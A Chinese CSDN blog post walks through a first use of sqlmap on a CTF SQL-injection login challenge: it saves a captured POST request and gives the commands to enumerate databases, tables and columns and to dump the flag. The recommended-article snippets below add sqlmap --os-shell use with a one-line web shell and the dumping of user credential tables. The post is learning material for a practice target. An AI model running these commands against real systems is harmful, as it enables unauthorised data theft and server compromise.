sqlmap初体验

最新推荐文章于 2023-04-21 06:42:16 发布
最新推荐文章于 2023-04-21 06:42:16 发布
阅读量122 收藏 1
点赞数
文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaolong22333/article/details/110785641
版权

看到一道简单的sql注入题,没有过滤,可以乘机学习一下sqlmap的用法
在这里插入图片描述
测试发现,用户名和密码都能注,手工就不演示了,直接上sqlmap
首先,因为是post请求,所以先抓包,把数据保存到sqlmap目录下(这里我保存成test.txt)
在这里插入图片描述
然后运行命令

sqlmap.py -r test.txt --dbs   //跑数据库名

在这里插入图片描述
然后查web2的表名

sqlmap.py -r test.txt -D web2 --tables  //跑表名

在这里插入图片描述
接着查flag的列名

sqlmap.py -r test.txt -T flag --columns   //跑列名

在这里插入图片描述
最后将flag里的内容输出

sqlmap.py -r test.txt -D web2 -T flag -C flag --dump

在这里插入图片描述

xiaolong22333
关注
【简单工具】SQLMap十大常用功能浅析(待完善)
Fighting_hawk的博客
01-28 4543
1. 了解SQLMap的主要功能和用法; 2. 后续再结合SQL语句、注入原理分析每个命令的实现过程。
sqlmap --os-shell 使用方法
最新发布
m0_50818626的博客
06-07 4321
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell 的使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap包。
sqlmap使用详解
weixin_59246157的博客
04-21 1724
id=1" -D security -T users -C username --dump --start 1 --stop 100 #爆出数据库security中的users表中的username列中的前100条数据。
sqlmap注入实战(三)
inslight的博客
09-19 519
一、寻找网站注入点 得到网站 通过burp,抓包,寻找post注入点 复制到sqlmap的根目录中,创建一个txt文件 输入命令sqlmap.py -r +文件名 由此可知,此为注入点 二、暴库 输入命令sqlmap.py -r +文件名 -dbs 输入命令sqlmap.py -r a.txt -D faka --tables获取表 输入命令sqlmap.py -r a.txt -D faka -T ayangw_config --columns获取字段名 输入命令sqlmap.py -r
Sqlmap的基本用法
m0_74989372的博客
04-12 950
id=1 -C"username,password" --dump -T users -D security)爆指定数据库的表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆数据库 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆所有表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?用sql注入靶场进行演示。
sqlmap账号密码登录mysql,Sqlmap初体验,渗透拿到网站用户名密码
weixin_30386973的博客
03-27 1159
前期准备:拿到目的网站时,要先停止信息搜集,目的是为了扩展目的范围。能够看一下有哪些“C段”(即同网段不同IP),有哪些二级域名“旁站”(即同效劳器的不同站点),这些都是你不可疏忽的潜在目的。武器:御剑,能够找C段,杀敌于无形。SubDomainsBrute,Layer子域名发掘机,能够找二级域名。御剑也能够扫出网站的后台(之后我们会用到)。接下来,判别可能存在的破绽,这一点客观经历很重要。效劳器...
渗透测试初体验
追风筝的孩子
07-27 1287
       前言:无意间接触到了渗透测试,这无意间燃起了我的学习欲望,所以利用业余时间来探索渗透测试这个领域。渐渐的发现,这不是一时兴起,渗透测试才是我的职业奋斗目标。接下来开始我的渗透之路!!! 一:什么是渗透测试 渗透测试:出于保护系统的目的,更全面地找出测试对象的安全隐患。通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的...
全栈初体验:Vue-cli3+MySql+express 连接数据库
qq_41555552的博客
08-28 3506
本博客参考了 https://segmentfault.com/a/1190000019331246 这里用了一个最简单的案例来实现整个用nodejs连数据库的过程。 总体结构初览 这里app文件里的项目是通过vue create hello-world指令创建。这里用的是vue-cli3脚手架搭建的项目,没有config文件夹。server里就会放和数据库有关的代码啦,可以先按这个架构把文件都...
【全栈初体验】Vue+Node+MySQL实现前后端分离开发
艾欢欢的博客
05-29 9112
前言 这个 demo 是MVVM开发模式,我也写过一个前后端结合开发的完整系统 demo Vue项目使用vue-cil3创建的。 使用vue-cil2创建的项目也可以实现,只是配置代理服务器的时候有一点差别。后面分别针对这两个版本进行区分。 数据库操作使用Navicat。 数据库配置 新建MySQL连接(参数可以自己配置,后面会用到) 新建数据库 新建数据表 Node...
mysqlsqlmap_大量SQL的解决方案——sdmap
weixin_33513842的博客
01-19 325
大量SQL的解决方案——sdmap最近看到群里面经常讨论大型应用中SQL的管理办法,有人说用EF/EF Core,但很多人不信任它生成SQL的语句;有人说用Dapper,但将SQL写到代码中有些人觉得不合适;有人提出用存储过程,但现在舆论纷纷反对这种做法;有人提出了iBatis.NET,它可以配置确保高灵活性高性能,也提供动态SQL的功能,但已经多年没有维护。在几年前,我们某项目中就有总共4MB以...
关于sqlmap 输入sqlmap.py -h 会txt文本打开sqlmap.py
s595674548的专栏
10-15 5513
关于sqlmap 输入sqlmap.py -h 会txt文本打开sqlmap.py       由于本人励志步入安全行业,在第一次使用sqlmap,安装网上的安装教程安装后,我尝试输入sqlmap.py -h  ,竟然文本打开sqlmap.py ; 开始我以为自己安装错了,或者配置环境变量不对,后来在网友那得到新的确定可用的python 和 sqlmap 安装,还是不可
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmappost型注入
weixin_30387339的博客
09-03 2108
bugku-成绩单 题目地址 手工注入: ①看到题目,分别提交1,2,3,出现不同的成绩单,可见参数我们是可以控制,通过POST的方式。 ②我们尝试输入1 and 1=1#和1 and 1=2#发现不报错,应该不是数字型注入。我们输入1',报错,这个数字(id)被'保护起来了。猜测SQL语句:~~~~where id ='$id';我们继续输入1' and 1=1#;和1' and 1=2#,发现...
sqlmap之(六)----POST登陆框注入实战
热门推荐
fendo
02-28 8万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,
SQLMAP介绍及使用
qq_53742230的博客
07-06 3808
安全工具SQLMAP的使用
sqlmap的应用实战
vala0901的博客
05-10 7233
小白一枚,在大神的各种帖子帮助下刚学会用sqlmap,写下过程一起分享
sqlmap的基本命令使用
Leonardo DiCaprio‘s spring
03-24 5万+
本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下; cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                 sqlmap.py -u 登
SQLMap详细使用攻略及技巧
weixin_46762210的博客
01-13 3166
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:sqlmap: automatic SQL injection and database takeover tool, 下载地址:https://github.com/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值